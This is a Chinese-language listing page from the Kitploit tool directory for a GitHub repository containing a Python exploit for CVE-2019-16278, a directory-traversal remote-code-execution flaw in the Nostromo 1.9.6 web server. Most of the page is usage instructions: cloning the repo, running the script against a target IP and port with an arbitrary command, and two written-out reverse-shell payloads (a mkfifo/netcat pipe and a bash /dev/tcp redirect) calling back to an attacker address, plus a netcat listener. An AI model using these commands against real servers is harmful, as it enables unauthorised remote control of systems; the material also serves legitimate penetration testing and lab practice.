Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution — 由于未能验证 URL,导致路径遍历到系统中存在的任何文件,未认证攻击者可以强制服务器指向诸如 '/bin/sh' 的 shell 文件并执行任意命令。Nostromo 的 1.9.6 等版本未能验证此 URL | Kitploit
工具/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

由于未能验证 URL,导致路径遍历到系统中存在的任何文件,未认证攻击者可以强制服务器指向诸如 '/bin/sh' 的 shell 文件并执行任意命令。Nostromo 的 1.9.6 等版本未能验证此 URL

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
11年前尚未审核
分享

POC

代码仓库: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 描述

本仓库包含针对 CVE-2019-16278 的 Python 漏洞利用脚本,该漏洞存在于 Nostromo 1.9.6(一款 Web 服务器)中。该漏洞通过目录遍历攻击,允许在目标系统上执行任意命令,从而实现远程代码执行(RCE)。

🚀 功能特性

  • 在脆弱目标上执行自定义 shell 命令。
  • 支持反向 shell 负载。
  • 可自定义从目标返回的响应大小。

🛠️ 环境要求

  • Python 3.x
  • 运行 Nostromo 1.9.6 的机器(脆弱目标)。
  • Netcat (nc) 用于捕获反向 shell。

⚙️ 使用方法

第一步:克隆仓库

root@kitploit:~
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

第二步:运行漏洞利用脚本

root@kitploit:~
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

参数说明:

参数描述必需默认值
-t, --target目标 IP 地址是无
-p, --port目标端口是无
-c, --command要在服务器上执行的命令是无
-b, --bytes从响应中读取的字节数否4096

🧑‍💻 示例

示例 1:在目标上运行 whoami

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

示例 2:使用 Netcat 实现反向 Shell

第一步: 在攻击机上启动 Netcat 监听器:

root@kitploit:~
nc -lvnp 443

第二步: 使用反向 Shell 负载执行漏洞利用脚本:

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

示例 3:使用 /dev/tcp 实现反向 Shell

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 漏洞详情

  • CVE 编号: CVE-2019-16278
  • 受影响的软件: Nostromo 1.9.6 Web 服务器
  • 漏洞类型: 目录遍历 → 远程代码执行

⚠️ 免责声明

此工具仅用于教育目的。请勿将其用于您未拥有或未经明确授权的系统。未经授权的系统访问是违法的。请负责任地使用。

下载工具